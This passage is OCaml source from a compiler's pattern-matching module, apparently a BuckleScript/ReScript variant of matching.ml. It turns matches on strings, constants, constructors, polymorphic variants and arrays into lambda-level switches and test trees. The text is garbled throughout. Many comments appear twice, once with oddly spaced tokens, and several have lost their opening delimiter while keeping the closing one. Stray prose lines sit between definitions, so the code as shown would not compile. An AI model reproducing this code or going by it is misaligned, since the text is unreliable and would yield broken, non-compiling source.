let lt,(s,act),gt = split len sw in
bind_sw
(Lprim
(prim_string_compare,
[arg; Lconst (Const_immstring s)], loc))
(fun r ->
tree_way_test loc r
(do_make_string_test_tree loc arg lt delta d)
act
(do_make_string_test_tree loc arg gt delta d))
(* Entry point *)
let expand_stringswitch loc arg sw d = match d with
| None ->
bind_sw arg
(fun arg -> do_make_string_test_tree loc arg sw 0 None)
| Some e ->
bind_sw arg
(fun arg ->
make_catch e
(fun d -> do_make_string_test_tree loc arg sw 1 (Some d)))
(**********************)
Generic test trees
(**********************)
Sharing
(* Add handler, if shared *)
let handle_shared () =
let hs = ref (fun x -> x) in
let handle_shared act = match act with
| Switch.Single act -> act
| Switch.Shared act ->
let i,h = make_catch_delayed act in
let ohs = !hs in
hs := (fun act -> h (ohs act)) ;
make_exit i in
hs,handle_shared
let share_actions_tree sw d =
let store = StoreExp.mk_store () in
(* Default action is always shared *)
let d =
match d with
| None -> None
| Some d -> Some (store.Switch.act_store_shared d) in
(* Store all other actions *)
let sw =
List.map (fun (cst,act) -> cst,store.Switch.act_store act) sw in
(* Retrieve all actions, including potential default *)
let acts = store.Switch.act_get_shared () in
(* Array of actual actions *)
let hs,handle_shared = handle_shared () in
let acts = Array.map handle_shared acts in
(* Reconstruct default and switch list *)
let d = match d with
| None -> None
| Some d -> Some (acts.(d)) in
let sw = List.map (fun (cst,j) -> cst,acts.(j)) sw in
!hs,sw,d
(* Note: dichotomic search requires sorted input with no duplicates *)
let rec uniq_lambda_list sw = match sw with
| []|[_] -> sw
| (c1,_ as p1)::((c2,_)::sw2 as sw1) ->
if const_compare c1 c2 = 0 then uniq_lambda_list (p1::sw2)
else p1::uniq_lambda_list sw1
let sort_lambda_list l =
let l =
List.stable_sort (fun (x,_) (y,_) -> const_compare x y) l in
uniq_lambda_list l
let rec cut n l =
if n = 0 then [],l
else match l with
[] -> raise (Invalid_argument "cut")
| a::l -> let l1,l2 = cut (n-1) l in a::l1, l2
let rec do_tests_fail loc fail tst arg = function
| [] -> fail
| (c, act)::rem ->
Lifthenelse
(Lprim (tst, [arg ; Lconst (Const_base c)], loc),
do_tests_fail loc fail tst arg rem,
act)
let rec do_tests_nofail loc tst arg = function
| [] -> fatal_error "Matching.do_tests_nofail"
| [_,act] -> act
| (c,act)::rem ->
Lifthenelse
(Lprim (tst, [arg ; Lconst (Const_base c)], loc),
do_tests_nofail loc tst arg rem,
act)
let make_test_sequence loc fail tst lt_tst arg const_lambda_list =
let const_lambda_list = sort_lambda_list const_lambda_list in
let hs,const_lambda_list,fail =
share_actions_tree const_lambda_list fail in
let rec make_test_sequence const_lambda_list =
if List.length const_lambda_list >= 4 && lt_tst <> Pignore then
split_sequence const_lambda_list
else match fail with
| None -> do_tests_nofail loc tst arg const_lambda_list
| Some fail -> do_tests_fail loc fail tst arg const_lambda_list
and split_sequence const_lambda_list =
let list1, list2 =
cut (List.length const_lambda_list / 2) const_lambda_list in
Lifthenelse(Lprim(lt_tst,
[arg; Lconst(Const_base (fst(List.hd list2)))],
loc),
make_test_sequence list1, make_test_sequence list2)
in
hs (make_test_sequence const_lambda_list)
module SArg = struct
type primitive = Lambda.primitive
let eqint = Pintcomp Ceq
let neint = Pintcomp Cneq
let leint = Pintcomp Cle
let ltint = Pintcomp Clt
let geint = Pintcomp Cge
let gtint = Pintcomp Cgt
type act = Lambda.lambda
let make_prim p args = Lprim (p,args,Location.none)
let make_offset arg n = match n with
| 0 -> arg
| _ -> Lprim (Poffsetint n,[arg],Location.none)
let bind arg body =
let newvar,newarg = match arg with
| Lvar v -> v,arg
| _ ->
let newvar = Ident.create "switcher" in
newvar,Lvar newvar in
bind Alias newvar arg (body newarg)
let make_const i = Lconst (Const_base (Const_int i))
let make_isout h arg = Lprim (Pisout, [h ; arg],Location.none)
let make_isin h arg = Lprim (Pnot,[make_isout h arg],Location.none)
let make_if cond ifso ifnot = Lifthenelse (cond, ifso, ifnot)
let make_switch loc arg cases acts ~offset sw_names =
let l = ref [] in
for i = Array.length cases-1 downto 0 do
l := (offset + i,acts.(cases.(i))) :: !l
done ;
Lswitch(arg,
{sw_numconsts = Array.length cases ; sw_consts = !l ;
sw_numblocks = 0 ; sw_blocks = [] ;
sw_failaction = None;
sw_names}, loc)
let make_catch = make_catch_delayed
let make_exit = make_exit
end
Action sharing for Lswitch argument
let share_actions_sw sw =
(* Attempt sharing on all actions *)
let store = StoreExp.mk_store () in
let fail = match sw.sw_failaction with
| None -> None
| Some fail ->
(* Fail is translated to exit, whatever happens *)
Some (store.Switch.act_store_shared fail) in
let consts =
List.map
(fun (i,e) -> i,store.Switch.act_store e)
sw.sw_consts
and blocks =
List.map
(fun (i,e) -> i,store.Switch.act_store e)
sw.sw_blocks in
let acts = store.Switch.act_get_shared () in
let hs,handle_shared = handle_shared () in
let acts = Array.map handle_shared acts in
let fail = match fail with
| None -> None
| Some fail -> Some (acts.(fail)) in
!hs,
{ sw with
sw_consts = List.map (fun (i,j) -> i,acts.(j)) consts ;
sw_blocks = List.map (fun (i,j) -> i,acts.(j)) blocks ;
sw_failaction = fail; }
(* Reintroduce fail action in switch argument,
for the sake of avoiding carrying over huge switches *)
let reintroduce_fail sw = match sw.sw_failaction with
| None ->
let t = Hashtbl.create 17 in
let seen (_,l) = match as_simple_exit l with
| Some i ->
let old = try Hashtbl.find t i with Not_found -> 0 in
Hashtbl.replace t i (old+1)
| None -> () in
List.iter seen sw.sw_consts ;
List.iter seen sw.sw_blocks ;
let i_max = ref (-1)
and max = ref (-1) in
Hashtbl.iter
(fun i c ->
if c > !max then begin
i_max := i ;
max := c
end) t ;
if !max >= 3 then
let default = !i_max in
let remove ls =
Ext_list.filter ls
(fun (_,lam) -> match as_simple_exit lam with
| Some j -> j <> default
| None -> true) in
{sw with
sw_consts = remove sw.sw_consts ;
sw_blocks = remove sw.sw_blocks ;
sw_failaction = Some (make_exit default)}
else sw
| Some _ -> sw
module Switcher = Switch.Make(SArg)
open Switch
let rec last def = function
| [] -> def
| [x,_] -> x
| _::rem -> last def rem
let get_edges low high l = match l with
| [] -> low, high
| (x,_)::_ -> x, last high l
let as_interval_canfail fail low high l =
let store = StoreExp.mk_store () in
let do_store _tag act =
let i = store.act_store act in
eprintf " STORE [ % s ] % i % s\n " tag i ( string_of_lam act ) ;
eprintf "STORE [%s] %i %s\n" tag i (string_of_lam act) ;
*)
i in
let rec nofail_rec cur_low cur_high cur_act = function
| [] ->
if cur_high = high then
[cur_low,cur_high,cur_act]
else
[(cur_low,cur_high,cur_act) ; (cur_high+1,high, 0)]
| ((i,act_i)::rem) as all ->
let act_index = do_store "NO" act_i in
if cur_high+1= i then
if act_index=cur_act then
nofail_rec cur_low i cur_act rem
else if act_index=0 then
(cur_low,i-1, cur_act)::fail_rec i i rem
else
(cur_low, i-1, cur_act)::nofail_rec i i act_index rem
else if act_index = 0 then
(cur_low, cur_high, cur_act)::
fail_rec (cur_high+1) (cur_high+1) all
else
(cur_low, cur_high, cur_act)::
(cur_high+1,i-1,0)::
nofail_rec i i act_index rem
and fail_rec cur_low cur_high = function
| [] -> [(cur_low, cur_high, 0)]
| (i,act_i)::rem ->
let index = do_store "YES" act_i in
if index=0 then fail_rec cur_low i rem
else
(cur_low,i-1,0)::
nofail_rec i i index rem in
let init_rec = function
| [] -> [low,high,0]
| (i,act_i)::rem ->
let index = do_store "INIT" act_i in
if index=0 then
fail_rec low i rem
else
if low < i then
(low,i-1,0)::nofail_rec i i index rem
else
nofail_rec i i index rem in
fail has action index 0
let r = init_rec l in
Array.of_list r, store
let as_interval_nofail l =
let store = StoreExp.mk_store () in
let rec some_hole = function
| []|[_] -> false
| (i,_)::((j,_)::_ as rem) ->
j > i+1 || some_hole rem in
let rec i_rec cur_low cur_high cur_act = function
| [] ->
[cur_low, cur_high, cur_act]
| (i,act)::rem ->
let act_index = store.act_store act in
if act_index = cur_act then
i_rec cur_low i cur_act rem
else
(cur_low, cur_high, cur_act)::
i_rec i i act_index rem in
let inters = match l with
| (i,act)::rem ->
let act_index =
(* In case there is some hole and that a switch is emitted,
action 0 will be used as the action of unreachable
cases (cf. switch.ml, make_switch).
Hence, this action will be shared *)
if some_hole rem then
store.act_store_shared act
else
store.act_store act in
assert (act_index = 0) ;
i_rec i i act_index rem
| _ -> assert false in
Array.of_list inters, store
let sort_int_lambda_list l =
List.sort
(fun (i1,_) (i2,_) ->
if i1 < i2 then -1
else if i2 < i1 then 1
else 0)
l
let as_interval fail low high l =
let l = sort_int_lambda_list l in
get_edges low high l,
(match fail with
| None -> as_interval_nofail l
| Some act -> as_interval_canfail act low high l)
let call_switcher loc fail arg low high int_lambda_list sw_names =
let edges, (cases, actions) =
as_interval fail low high int_lambda_list in
Switcher.zyva loc edges arg cases actions sw_names
let rec list_as_pat = function
| [] -> fatal_error "Matching.list_as_pat"
| [pat] -> pat
| pat::rem ->
{pat with pat_desc = Tpat_or (pat,list_as_pat rem,None)}
let complete_pats_constrs = function
| p::_ as pats ->
List.map
(pat_of_constr p)
(complete_constrs p (List.map get_key_constr pats))
| _ -> assert false
Following two ` ` failaction '' function compute n , the trap handler
to jump to in case of failure of elementary tests
Following two ``failaction'' function compute n, the trap handler
to jump to in case of failure of elementary tests
*)
let mk_failaction_neg partial ctx def = match partial with
| Partial ->
begin match def with
| (_,idef)::_ ->
Some (Lstaticraise (idef,[])),jumps_singleton idef ctx
| [] ->
(* Act as Total, this means
If no appropriate default matrix exists,
then this switch cannot fail *)
None, jumps_empty
end
| Total ->
None, jumps_empty
(* In line with the article and simpler than before *)
let mk_failaction_pos partial seen ctx defs =
if dbg then begin
prerr_endline "**POS**" ;
pretty_def defs ;
()
end ;
let rec scan_def env to_test defs = match to_test,defs with
| ([],_)|(_,[]) ->
List.fold_left
(fun (klist,jumps) (pats,i)->
let action = Lstaticraise (i,[]) in
let klist =
List.fold_right
(fun pat r -> (get_key_constr pat,action)::r)
pats klist
and jumps =
jumps_add i (ctx_lub (list_as_pat pats) ctx) jumps in
klist,jumps)
([],jumps_empty) env
| _,(pss,idef)::rem ->
let now, later =
List.partition
(fun (_p,p_ctx) -> ctx_match p_ctx pss) to_test in
match now with
| [] -> scan_def env to_test rem
| _ -> scan_def ((List.map fst now,idef)::env) later rem in
let fail_pats = complete_pats_constrs seen in
if List.length fail_pats < 32 then begin
let fail,jmps =
scan_def
[]
(List.map
(fun pat -> pat, ctx_lub pat ctx)
fail_pats)
defs in
if dbg then begin
eprintf "POSITIVE JUMPS [%i]:\n" (List.length fail_pats);
pretty_jumps jmps
end ;
None,fail,jmps
end else begin (* Too many non-matched constructors -> reduced information *)
if dbg then eprintf "POS->NEG!!!\n%!" ;
let fail,jumps = mk_failaction_neg partial ctx defs in
if dbg then
eprintf "FAIL: %s\n"
(match fail with
| None -> "<none>"
| Some lam -> string_of_lam lam) ;
fail,[],jumps
end
let combine_constant names loc arg cst partial ctx def
(const_lambda_list, total, _pats) =
let fail, local_jumps =
mk_failaction_neg partial ctx def in
let lambda1 =
match cst with
| Const_int _ ->
let int_lambda_list =
List.map (function Const_int n, l -> n,l | _ -> assert false)
const_lambda_list in
call_switcher loc fail arg min_int max_int int_lambda_list names
| Const_char _ ->
let int_lambda_list =
List.map (function Const_char c, l -> (c, l)
| _ -> assert false)
const_lambda_list in
call_switcher loc fail arg 0 max_int int_lambda_list names
| Const_string _ ->
(* Note as the bytecode compiler may resort to dichotomic search,
the clauses of stringswitch are sorted with duplicates removed.
This partly applies to the native code compiler, which requires
no duplicates *)
let const_lambda_list = sort_lambda_list const_lambda_list in
let sw =
List.map
(fun (c,act) -> match c with
| Const_string (s,_) -> s,act
| _ -> assert false)
const_lambda_list in
let hs,sw,fail = share_actions_tree sw fail in
hs (Lstringswitch (arg,sw,fail,loc))
| Const_float _ ->
make_test_sequence loc
fail
(Pfloatcomp Cneq) (Pfloatcomp Clt)
arg const_lambda_list
| Const_int32 _ ->
make_test_sequence loc
fail
(Pbintcomp(Pint32, Cneq)) (Pbintcomp(Pint32, Clt))
arg const_lambda_list
| Const_int64 _ ->
make_test_sequence loc
fail
(Pbintcomp(Pint64, Cneq)) (Pbintcomp(Pint64, Clt))
arg const_lambda_list
| Const_nativeint _ ->
make_test_sequence loc
fail
(Pbintcomp(Pnativeint, Cneq)) (Pbintcomp(Pnativeint, Clt))
arg const_lambda_list
in lambda1,jumps_union local_jumps total
let split_cases tag_lambda_list =
let rec split_rec = function
[] -> ([], [])
| (cstr, act) :: rem ->
let (consts, nonconsts) = split_rec rem in
match cstr with
Cstr_constant n -> ((n, act) :: consts, nonconsts)
| Cstr_block n -> (consts, (n, act) :: nonconsts)
| Cstr_unboxed -> (consts, (0, act) :: nonconsts)
| Cstr_extension _ -> assert false in
let const, nonconst = split_rec tag_lambda_list in
sort_int_lambda_list const,
sort_int_lambda_list nonconst
(* refine [split_cases] and [split_variant_cases] *)
let split_variant_cases tag_lambda_list =
let rec split_rec = function
[] -> ([], [])
| ((name,cstr), act) :: rem ->
let (consts, nonconsts) = split_rec rem in
match cstr with
Cstr_constant n -> ((n, (name, act)) :: consts, nonconsts)
| Cstr_block n -> (consts, (n, (name, act)) :: nonconsts)
| Cstr_unboxed -> assert false
| Cstr_extension _ -> assert false in
let const, nonconst = split_rec tag_lambda_list in
sort_int_lambda_list const,
sort_int_lambda_list nonconst
let split_extension_cases tag_lambda_list =
let rec split_rec = function
[] -> ([], [])
| (cstr, act) :: rem ->
let (consts, nonconsts) = split_rec rem in
match cstr with
Cstr_extension(path, true) when not !Config.bs_only -> ((path, act) :: consts, nonconsts)
| Cstr_extension(path, _) -> (consts, (path, act) :: nonconsts)
| _ -> assert false in
split_rec tag_lambda_list
let extension_slot_eq =
Pccall (Primitive.simple ~name:"#extension_slot_eq" ~arity:2 ~alloc:false)
let combine_constructor sw_names loc arg ex_pat cstr partial ctx def
(tag_lambda_list, total1, pats) =
if cstr.cstr_consts < 0 then begin
(* Special cases for extensions *)
let fail, local_jumps =
mk_failaction_neg partial ctx def in
let lambda1 =
let consts, nonconsts = split_extension_cases tag_lambda_list in
let default, consts, nonconsts =
match fail with
| None ->
begin match consts, nonconsts with
| _, (_, act)::rem -> act, consts, rem
| (_, act)::rem, _ -> act, rem, nonconsts
| _ -> assert false
end
| Some fail -> fail, consts, nonconsts in
let nonconst_lambda =
match nonconsts with
[] -> default
| _ ->
let tag = Ident.create "tag" in
let tests =
List.fold_right
(fun (path, act) rem ->
let ext = transl_extension_path ex_pat.pat_env path in
Lifthenelse(Lprim(extension_slot_eq , [Lvar tag; ext], loc),
act, rem))
nonconsts
default
in
Llet(Alias, Pgenval,tag, arg, tests)
in
List.fold_right
(fun (path, act) rem ->
let ext = transl_extension_path ex_pat.pat_env path in
Lifthenelse(Lprim(extension_slot_eq , [arg; ext], loc),
act, rem))
consts
nonconst_lambda
in
lambda1, jumps_union local_jumps total1
end else begin
(* Regular concrete type *)
let ncases = List.length tag_lambda_list
and nconstrs = cstr.cstr_consts + cstr.cstr_nonconsts in
let sig_complete = ncases = nconstrs in
let fail_opt,fails,local_jumps =
if sig_complete then None,[],jumps_empty
else
mk_failaction_pos partial pats ctx def in
let tag_lambda_list = fails @ tag_lambda_list in
let (consts, nonconsts) = split_cases tag_lambda_list in
let lambda1 =
match fail_opt,same_actions tag_lambda_list with
| None,Some act -> act (* Identical actions, no failure *)
| _ ->
match
(cstr.cstr_consts, cstr.cstr_nonconsts, consts, nonconsts)
with
| (1, 1, [0, act1], [0, act2]) ->
(* Typically, match on lists, will avoid isint primitive in that
case *)
let arg =
if !Config.bs_only && Datarepr.constructor_has_optional_shape cstr then
Lprim(is_not_none_bs_primitve , [arg], loc)
else arg
in
Lifthenelse(arg, act2, act1)
| (2,0, [(i1,act1); (_,act2)],[]) ->
if i1 = 0 then Lifthenelse(arg, act2, act1)
else Lifthenelse (arg,act1,act2)
| (n,0,_,[]) -> (* The type defines constant constructors only *)
call_switcher loc fail_opt arg 0 (n-1) consts sw_names
| (n, _, _, _) ->
let act0 =
(* = Some act when all non-const constructors match to act *)
match fail_opt,nonconsts with
| Some a,[] -> Some a
| Some _,_ ->
if List.length nonconsts = cstr.cstr_nonconsts then
same_actions nonconsts
else None
| None,_ -> same_actions nonconsts in
match act0 with
| Some act ->
Lifthenelse
(Lprim (Pisint, [arg], loc),
call_switcher loc
fail_opt arg
0 (n-1) consts sw_names,
act)
(* Emit a switch, as bytecode implements this sophisticated instruction *)
| None ->
let sw =
{sw_numconsts = cstr.cstr_consts; sw_consts = consts;
sw_numblocks = cstr.cstr_nonconsts; sw_blocks = nonconsts;
sw_failaction = fail_opt;
sw_names} in
let hs,sw = share_actions_sw sw in
let sw = reintroduce_fail sw in
hs (Lswitch (arg,sw,loc)) in
lambda1, jumps_union local_jumps total1
end
let make_test_sequence_variant_constant fail arg int_lambda_list =
let _, (cases, actions) =
as_interval fail min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) in
Switcher.test_sequence arg cases actions
let call_switcher_variant_constant loc fail arg int_lambda_list names =
call_switcher loc fail arg min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names
let call_switcher_variant_constr loc fail arg int_lambda_list names =
let v = Ident.create "variant" in
Llet(Alias, Pgenval, v, Lprim(Pfield (0, Fld_poly_var_tag), [arg], loc),
call_switcher loc
fail (Lvar v) min_int max_int (List.map (fun (a,(_,c)) -> (a,c)) int_lambda_list) names)
let call_switcher_variant_constant :
(Location.t ->
Lambda.lambda option ->
Lambda.lambda ->
(int * (string * Lambda.lambda)) list ->
Lambda.switch_names option ->
Lambda.lambda)
ref= ref call_switcher_variant_constant
let call_switcher_variant_constr :
(Location.t ->
Lambda.lambda option ->
Lambda.lambda ->
(int * (string * Lambda.lambda)) list ->
Lambda.switch_names option ->
Lambda.lambda)
ref
= ref call_switcher_variant_constr
let make_test_sequence_variant_constant :
(Lambda.lambda option ->
Lambda.lambda ->
(int * (string * Lambda.lambda)) list ->
Lambda.lambda)
ref
= ref make_test_sequence_variant_constant
let combine_variant names loc row arg partial ctx def
(tag_lambda_list, total1, _pats) =
let row = Btype.row_repr row in
let num_constr = ref 0 in
if row.row_closed then
List.iter
(fun (_, f) ->
match Btype.row_field_repr f with
Rabsent | Reither(true, _::_, _, _) -> ()
| _ -> incr num_constr)
row.row_fields
else
num_constr := max_int;
let test_int_or_block arg if_int if_block =
if !Config.bs_only then
Lifthenelse(Lprim (Pccall(Primitive.simple ~name:"#is_poly_var_block" ~arity:1 ~alloc:false), [arg], loc), if_block, if_int)
else
Lifthenelse(Lprim (Pisint, [arg], loc), if_int, if_block) in
let sig_complete = List.length tag_lambda_list = !num_constr
and one_action = same_actions tag_lambda_list in (* reduandant work under bs context *)
let fail, local_jumps =
if
sig_complete || (match partial with Total -> true | _ -> false)
then
None, jumps_empty
else
mk_failaction_neg partial ctx def in
let (consts, nonconsts) = split_variant_cases tag_lambda_list in
let lambda1 = match fail, one_action with
| None, Some act -> act
| _,_ ->
match (consts, nonconsts) with
| ([_, (_,act1)], [_, (_,act2)]) when fail=None ->
test_int_or_block arg act1 act2
| (_, []) -> (* One can compare integers and pointers *)
!make_test_sequence_variant_constant fail arg consts
| ([], _) ->
let lam = !call_switcher_variant_constr loc
fail arg nonconsts names in
(* One must not dereference integers *)
begin match fail with
| None -> lam
| Some fail -> test_int_or_block arg fail lam
end
| (_, _) ->
let lam_const =
!call_switcher_variant_constant loc
fail arg consts names
and lam_nonconst =
!call_switcher_variant_constr loc
fail arg nonconsts names in
test_int_or_block arg lam_const lam_nonconst
in
lambda1, jumps_union local_jumps total1
let combine_array names loc arg partial ctx def
(len_lambda_list, total1, _pats) =
let fail, local_jumps = mk_failaction_neg partial ctx def in
let lambda1 =
let newvar = Ident.create "len" in
let switch =
call_switcher loc
fail (Lvar newvar)
0 max_int len_lambda_list names in
bind
Alias newvar (Lprim(Parraylength , [arg], loc)) switch in
lambda1, jumps_union local_jumps total1
(* Insertion of debugging events *)
let [@inline] event_branch _repr lam = lam
This exception is raised when the compiler can not produce code
because control can not reach the compiled clause ,
Unused is raised initially in compile_test .
compile_list ( for compiling switch results ) catch Unused
comp_match_handlers ( for compiling splitted matches )
may Unused
This exception is raised when the compiler cannot produce code
because control cannot reach the compiled clause,
Unused is raised initially in compile_test.
compile_list (for compiling switch results) catch Unused
comp_match_handlers (for compiling splitted matches)
may reraise Unused
*)
exception Unused
let compile_list compile_fun division =
let rec c_rec totals = function
| [] -> [], jumps_unions totals, []
| (key, cell) :: rem ->
begin match cell.ctx with
| [] -> c_rec totals rem
| _ ->
try
let (lambda1, total1) = compile_fun cell.ctx cell.pm in
let c_rem, total, new_pats =
c_rec
(jumps_map ctx_combine total1::totals) rem in
((key,lambda1)::c_rem), total, (cell.pat::new_pats)
with
| Unused -> c_rec totals rem
end in
c_rec [] division
let compile_orhandlers compile_fun lambda1 total1 ctx to_catch =
let rec do_rec r total_r = function
| [] -> r,total_r
| (mat,i,vars,pm)::rem ->
begin try
let ctx = select_columns mat ctx in
let handler_i, total_i =
compile_fun ctx pm in
match raw_action r with
| Lstaticraise (j,args) ->
if i=j then
List.fold_right2 (bind Alias) vars args handler_i,
jumps_map (ctx_rshift_num (ncols mat)) total_i
else
do_rec r total_r rem
| _ ->
do_rec
(Lstaticcatch (r,(i,vars), handler_i))
(jumps_union
(jumps_remove i total_r)
(jumps_map (ctx_rshift_num (ncols mat)) total_i))
rem
with
| Unused ->
do_rec (Lstaticcatch (r, (i,vars), lambda_unit)) total_r rem
end in
do_rec lambda1 total1 to_catch
let compile_test compile_fun partial divide combine ctx to_match =
let division = divide ctx to_match in
let c_div = compile_list compile_fun division in
match c_div with
| [],_,_ ->
begin match mk_failaction_neg partial ctx to_match.default with
| None,_ -> raise Unused
| Some l,total -> l,total
end
| _ ->
combine ctx to_match.default c_div
(* Attempt to avoid some useless bindings by lowering them *)
(* Approximation of v present in lam *)
let rec approx_present v = function
| Lconst _ -> false
| Lstaticraise (_,args) ->
List.exists (fun lam -> approx_present v lam) args
| Lprim (_,args,_) ->
List.exists (fun lam -> approx_present v lam) args
| Llet (Alias, _k, _, l1, l2) ->
approx_present v l1 || approx_present v l2
| Lvar vv -> Ident.same v vv
| _ -> true
let rec lower_bind v arg lam = match lam with
| Lifthenelse (cond, ifso, ifnot) ->
let pcond = approx_present v cond
and pso = approx_present v ifso
and pnot = approx_present v ifnot in
begin match pcond, pso, pnot with
| false, false, false -> lam
| false, true, false ->
Lifthenelse (cond, lower_bind v arg ifso, ifnot)
| false, false, true ->
Lifthenelse (cond, ifso, lower_bind v arg ifnot)
| _,_,_ -> bind Alias v arg lam
end
| Lswitch (ls,({sw_consts=[i,act] ; sw_blocks = []} as sw), loc)
when not (approx_present v ls) ->
Lswitch (ls, {sw with sw_consts = [i,lower_bind v arg act]}, loc)
| Lswitch (ls,({sw_consts=[] ; sw_blocks = [i,act]} as sw), loc)
when not (approx_present v ls) ->
Lswitch (ls, {sw with sw_blocks = [i,lower_bind v arg act]}, loc)
| Llet (Alias, k, vv, lv, l) ->
if approx_present v lv then
bind Alias v arg lam
else
Llet (Alias, k, vv, lv, lower_bind v arg l)
| Lvar u when Ident.same u v && Ident.name u = "*sth*" ->
arg (* eliminate let *sth* = from_option x in *sth* *)
| _ ->
bind Alias v arg lam
let bind_check str v arg lam = match str,arg with
| _, Lvar _ ->bind str v arg lam
| Alias,_ -> lower_bind v arg lam
| _,_ -> bind str v arg lam
let comp_exit ctx m = match m.default with
| (_,i)::_ -> Lstaticraise (i,[]), jumps_singleton i ctx
| _ -> fatal_error "Matching.comp_exit"
let rec comp_match_handlers comp_fun partial ctx arg first_match next_matchs =
match next_matchs with
| [] -> comp_fun partial ctx arg first_match
| rem ->
let rec c_rec body total_body = function
| [] -> body, total_body
(* Hum, -1 means never taken
| (-1,pm)::rem -> c_rec body total_body rem *)
| (i,pm)::rem ->
let ctx_i,total_rem = jumps_extract i total_body in
begin match ctx_i with
| [] -> c_rec body total_body rem
| _ ->
try
let li,total_i =
comp_fun
(match rem with [] -> partial | _ -> Partial)
ctx_i arg pm in
c_rec
(Lstaticcatch (body,(i,[]),li))
(jumps_union total_i total_rem)
rem
with
| Unused ->
c_rec (Lstaticcatch (body,(i,[]),lambda_unit))
total_rem rem
end in
try
let first_lam,total = comp_fun Partial ctx arg first_match in
c_rec first_lam total rem
with Unused -> match next_matchs with
| [] -> raise Unused
| (_,x)::xs -> comp_match_handlers comp_fun partial ctx arg x xs
(* To find reasonable names for variables *)
let rec name_pattern default = function
(pat :: _, _) :: rem ->
begin match Typecore.id_of_pattern pat with
| Some id -> id
| None -> name_pattern default rem
end
| _ -> Ident.create default
let arg_to_var arg cls = match arg with
| Lvar v -> v,arg
| _ ->
let v = name_pattern "match" cls in
v,Lvar v
(* To be set by Lam_compile *)
let names_from_construct_pattern : (pattern -> switch_names option) ref =
ref (fun _ -> None)
The main compilation function .
Input :
repr = used for inserting debug events
partial = exhaustiveness information from Parmatch
ctx = a context
m = a pattern matching
Output : a lambda term , a jump summary { ... , exit number - > context , .. }
The main compilation function.
Input:
repr=used for inserting debug events
partial=exhaustiveness information from Parmatch
ctx=a context
m=a pattern matching
Output: a lambda term, a jump summary {..., exit number -> context, .. }
*)
let rec compile_match repr partial ctx m = match m with
| { cases = []; args = [] } -> comp_exit ctx m
| { cases = ([], action) :: rem } ->
if is_guarded action then begin
let (lambda, total) =
compile_match None partial ctx { m with cases = rem } in
event_branch repr (patch_guarded lambda action), total
end else
(event_branch repr action, jumps_empty)
| { args = (arg, str)::argl } ->
let v,newarg = arg_to_var arg m.cases in
let first_match,rem =
split_precompile (Some v)
{ m with args = (newarg, Alias) :: argl } in
let (lam, total) =
comp_match_handlers
((if dbg then do_compile_matching_pr else do_compile_matching) repr)
partial ctx newarg first_match rem in
bind_check str v arg lam, total
| _ -> assert false
(* verbose version of do_compile_matching, for debug *)
and do_compile_matching_pr repr partial ctx arg x =
prerr_string "COMPILE: " ;
prerr_endline (match partial with Partial -> "Partial" | Total -> "Total") ;
prerr_endline "MATCH" ;
pretty_precompiled x ;
prerr_endline "CTX" ;
pretty_ctx ctx ;
let (_, jumps) as r = do_compile_matching repr partial ctx arg x in
prerr_endline "JUMPS" ;
pretty_jumps jumps ;
r
and do_compile_matching repr partial ctx arg pmh = match pmh with
| Pm pm ->
let pat = what_is_cases pm.cases in
begin match pat.pat_desc with
| Tpat_any ->
compile_no_test
divide_var ctx_rshift repr partial ctx pm
| Tpat_tuple patl ->
compile_no_test
(divide_tuple (List.length patl) (normalize_pat pat)) ctx_combine
repr partial ctx pm
| Tpat_record ((_, lbl,_)::_,_) ->
compile_no_test
(divide_record lbl.lbl_all (normalize_pat pat))
ctx_combine repr partial ctx pm
| Tpat_constant cst ->
let names = None in
compile_test
(compile_match repr partial) partial
divide_constant
(combine_constant names pat.pat_loc arg cst partial)
ctx pm
| Tpat_construct (_, cstr, _) ->
let sw_names = !names_from_construct_pattern pat in
compile_test
(compile_match repr partial) partial
divide_constructor
(combine_constructor sw_names pat.pat_loc arg pat cstr partial)
ctx pm
| Tpat_array _ ->
let names = None in
compile_test (compile_match repr partial) partial
divide_array (combine_array names pat.pat_loc arg partial)
ctx pm
| Tpat_lazy _ ->
compile_no_test
(divide_lazy (normalize_pat pat))
ctx_combine repr partial ctx pm
| Tpat_variant(_, _, row) ->
let names = None in
compile_test (compile_match repr partial) partial
(divide_variant !row)
(combine_variant names pat.pat_loc !row arg partial)
ctx pm
| _ -> assert false
end
| PmVar {inside=pmh ; var_arg=arg} ->
let lam, total =
do_compile_matching repr partial (ctx_lshift ctx) arg pmh in
lam, jumps_map ctx_rshift total
| PmOr {body=body ; handlers=handlers} ->
let lam, total = compile_match repr partial ctx body in
compile_orhandlers (compile_match repr partial) lam total ctx handlers
and compile_no_test divide up_ctx repr partial ctx to_match =
let {pm=this_match ; ctx=this_ctx } = divide ctx to_match in
let lambda,total = compile_match repr partial this_ctx this_match in
lambda, jumps_map up_ctx total
(* The entry points *)
If there is a guard in a matching or a lazy pattern ,
then set exhaustiveness info to Partial .
( because of side effects , assume the worst ) .
Notice that exhaustiveness information is trusted by the compiler ,
that is , a match flagged as Total should not fail at runtime .
More specifically , for instance if match y with x : : _ - > x is flagged
total ( as it happens during JoCaml compilation ) then y can not be [ ]
at runtime . As a consequence , the static Total exhaustiveness information
have to be downgraded to Partial , in the dubious cases where guards
or lazy pattern execute arbitrary code that may perform side effects
and change the subject values .
LM :
Lazy pattern was PR#5992 , initial patch by lpw25 .
I have generalized the patch , so as to also find mutable fields .
If there is a guard in a matching or a lazy pattern,
then set exhaustiveness info to Partial.
(because of side effects, assume the worst).
Notice that exhaustiveness information is trusted by the compiler,
that is, a match flagged as Total should not fail at runtime.
More specifically, for instance if match y with x::_ -> x is flagged
total (as it happens during JoCaml compilation) then y cannot be []
at runtime. As a consequence, the static Total exhaustiveness information
have to be downgraded to Partial, in the dubious cases where guards
or lazy pattern execute arbitrary code that may perform side effects
and change the subject values.
LM:
Lazy pattern was PR#5992, initial patch by lpw25.
I have generalized the patch, so as to also find mutable fields.
*)
let find_in_pat pred =
let rec find_rec p =
pred p.pat_desc ||
begin match p.pat_desc with
| Tpat_alias (p,_,_) | Tpat_variant (_,Some p,_) | Tpat_lazy p ->
find_rec p
| Tpat_tuple ps|Tpat_construct (_,_,ps) | Tpat_array ps ->
List.exists find_rec ps
| Tpat_record (lpats,_) ->
List.exists
(fun (_, _, p) -> find_rec p)
lpats
| Tpat_or (p,q,_) ->
find_rec p || find_rec q
| Tpat_constant _ | Tpat_var _
| Tpat_any | Tpat_variant (_,None,_) -> false
end in
find_rec
let is_lazy_pat = function
| Tpat_lazy _ -> true
